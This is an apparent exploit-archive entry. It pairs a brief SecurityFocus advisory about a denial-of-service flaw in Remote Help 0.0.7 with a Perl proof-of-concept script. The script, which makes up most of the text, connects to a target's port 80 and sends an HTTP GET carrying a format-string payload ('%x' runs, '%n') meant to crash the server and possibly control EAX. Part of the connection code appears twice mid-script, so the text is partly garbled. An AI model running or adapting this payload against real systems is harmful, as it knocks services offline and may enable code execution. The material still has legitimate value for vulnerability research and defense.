source: https://www.securityfocus.com/bid/38875/info
Remote Help is prone to a denial-of-service vulnerability.
Remote attackers can exploit this issue to cause the application to crash, denying service to legitimate users. Due to the nature of this issue arbitrary code-execution may be possible; however this has not been confirmed.
Remote Help 0.0.7 is vulnerable; other versions may also be affected.# Exploit Title : Remote Help 0.0.7 Remote DoS# Date: 20 Mar 2010# Author: Rick2600 (ricks2600[at]gmail{dot}com)# Bug found by: Rick2600# Software Link : http://www.softpedia.com/progDownload/Remote-Help-Download-144888.html# Version : 0.0.7# OS: Windows# Tested on : XP SP2 En# Type of vuln: DoS# Greetz to : Corelan Security Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/## Script provided 'as is', without any warranty.# Use for educational purposes only.### Code :
print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________________/ /___ _____ / /________ _____ ___|\n";
print "|/ ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n";
print "||\n";
print "| http://www.corelan.be:8800 |\n";
print "||\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] DoS exploit for Remote Help 0.0.7 Http\n";
use IO::Socket;if($#ARGV != 0) {
print $#ARGV;
print "\nusage: $0 <targetip>\n";exit(0);}
print "[+] Connecting to server $ARGV[0] on port 80\n\n";$remote = IO::Socket::INET->new( Proto => "tcp",if($#ARGV != 0) {
print $#ARGV;
print "\nusage: $0 <targetip>\n";exit(0);}
print "[+] Connecting to server $ARGV[0] on port 80\n\n";$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr=> $ARGV[0],
PeerPort=> "http(80)",);
unless ($remote){ die "Cannot connect to Remote Help daemon on $ARGV[0]\n"}
print "[+] Connected!\n";#CONTROL EAX$payload = "/index.html"."%x" x 90 ."A" x 250 ."%x" x 186."%.999999x" x 15 ."%.199999x"."%nX"."DCBA";
print "[+] Sending Malicious Request\n";
print $remote"GET $payload HTTP/1.1\r\n";
close $remote;